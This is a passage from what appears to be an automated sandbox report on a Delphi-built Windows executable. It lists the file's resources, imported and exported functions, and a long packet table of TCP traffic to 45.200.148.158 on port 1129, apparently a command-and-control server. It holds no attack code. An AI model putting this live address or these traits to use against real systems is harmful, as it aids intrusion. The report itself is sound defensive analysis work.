                                                                                                                                                RT_STRING0x422acc0x3d4data0.37755102040816324
                                                                                                                                                RT_STRING0x422ea00x4ccdata0.3135179153094462
                                                                                                                                                RT_STRING0x42336c0x250data0.33952702702702703
                                                                                                                                                RT_STRING0x4235bc0x414data0.4157088122605364
                                                                                                                                                RT_STRING0x4239d00x4d4data0.3932038834951456
                                                                                                                                                RT_STRING0x423ea40x490data0.3347602739726027
                                                                                                                                                RT_STRING0x4243340x390data0.34978070175438597
                                                                                                                                                RT_STRING0x4246c40x458data0.38669064748201437
                                                                                                                                                RT_STRING0x424b1c0x1ecdata0.3983739837398374
                                                                                                                                                RT_STRING0x424d080xc4data0.6428571428571429
                                                                                                                                                RT_STRING0x424dcc0x170data0.5597826086956522
                                                                                                                                                RT_STRING0x424f3c0x334data0.41585365853658535
                                                                                                                                                RT_STRING0x4252700x408data0.3168604651162791
                                                                                                                                                RT_STRING0x4256780x38cdata0.3876651982378855
                                                                                                                                                RT_STRING0x425a040x2b4data0.4263005780346821
                                                                                                                                                RT_RCDATA0x425cb80x10data1.5
                                                                                                                                                RT_RCDATA0x425cc80xcacdata0.49506781750924783
                                                                                                                                                RT_RCDATA0x4269740x151Delphi compiled form 'TForm1'0.7210682492581603
                                                                                                                                                RT_RCDATA0x426ac80x3a205dataEnglishUnited States0.6415397862108071
                                                                                                                                                RT_GROUP_CURSOR0x460cd00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                RT_GROUP_CURSOR0x460ce40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                RT_GROUP_CURSOR0x460cf80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d0c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_ICON0x460d5c0x4cdata0.8289473684210527
                                                                                                                                                RT_VERSION0x460da80x314dataChineseChina0.45558375634517767

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                user32.dllCharNextW, LoadStringW
                                                                                                                                                kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
                                                                                                                                                kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                                                                                                                                user32.dllSetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMetaRgn, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                                                                                                                                                version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CopyFileW, CompareStringW, CloseHandle
                                                                                                                                                advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
                                                                                                                                                kernel32.dllSleep
                                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                                oleaut32.dllGetErrorInfo, SysFreeString
                                                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                                                                user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
                                                                                                                                                shell32.dllShell_NotifyIconW
                                                                                                                                                winspool.drvOpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
                                                                                                                                                winspool.drvGetDefaultPrinterW

                                                                                                                                                Exports

                                                                                                                                                NameOrdinalAddress
                                                                                                                                                TMethodImplementationIntercept30x492040
                                                                                                                                                __dbk_fcall_wrapper20x415e90
                                                                                                                                                dbkFCallWrapperAddr10x7a7f58

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States
                                                                                                                                                ChineseChina

                                                                                                                                                Network Behavior

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Jan 5, 2025 17:48:54.850106955 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:54.855098963 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:54.855170012 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:54.855734110 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:54.860598087 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:55.486566067 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:55.540007114 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:57.783535957 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:57.788434982 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:57.788535118 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:57.793308973 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.086827040 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.133747101 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.210899115 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.212754011 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.219064951 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.219151020 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.223994017 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.522989988 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.571263075 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.655544043 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.655725002 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.660492897 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.660543919 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.665342093 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.666738033 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.671482086 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.671526909 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.676359892 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.776405096 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.781199932 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:58.781260967 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:58.786053896 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.037879944 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038202047 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038213968 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038233042 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038247108 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038255930 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.038259029 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038268089 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038316965 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.038356066 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.038531065 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038569927 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038573027 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.038580894 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038613081 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.038630009 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038640022 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.038691044 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.206361055 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206382036 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206393957 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206404924 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206417084 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206428051 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206439972 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206456900 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206466913 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206471920 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206479073 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206495047 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206496000 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.206506968 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206521034 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206542015 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206561089 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206573963 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206587076 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206600904 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206604004 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.206613064 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.206629992 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.206641912 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.206657887 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.292819023 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.292838097 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.292886972 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.292896986 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.292924881 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.292936087 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.292969942 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.292980909 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.292994976 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.293026924 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.293678045 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.293689013 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.293699026 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.293704033 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.293715000 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.293735027 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.293776035 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.294312954 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.294329882 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.294344902 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.294354916 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.294365883 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.294370890 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.294378996 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.294399977 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.294414997 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.295165062 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.336853027 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.365133047 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365289927 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365299940 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365312099 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365328074 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.365360022 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.365520000 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365530014 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365544081 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365556955 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365569115 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365571976 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.365580082 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365586996 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.365587950 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.365626097 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.366178036 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.366188049 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.366198063 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.366225958 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.366250992 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.382597923 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.382607937 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.382653952 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.382664919 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.382675886 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.382685900 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.382713079 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.430615902 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.446615934 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.446701050 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.446712017 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.446722031 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.446779966 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.446784019 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.446800947 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.446811914 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.446822882 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.446852922 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.447119951 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447129965 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447141886 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447150946 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447165012 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.447186947 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.447515965 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447526932 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447537899 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447551012 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447562933 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447607040 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.447743893 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.448172092 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.448183060 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.448193073 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.448220015 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.448240042 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.536293030 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.586878061 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.835494995 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.840325117 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:48:59.840399981 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:48:59.845194101 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:00.037086964 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:00.041975021 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:00.042043924 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:00.046849966 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:00.150499105 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:00.155299902 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:00.155379057 CET497041129192.168.2.545.200.148.158
                                                                                                                                                Jan 5, 2025 17:49:00.160187006 CET11294970445.200.148.158192.168.2.5
                                                                                                                                                Jan 5, 2025 17:49:00.520243883 CET11294970445.200.148.158192.168.2.5
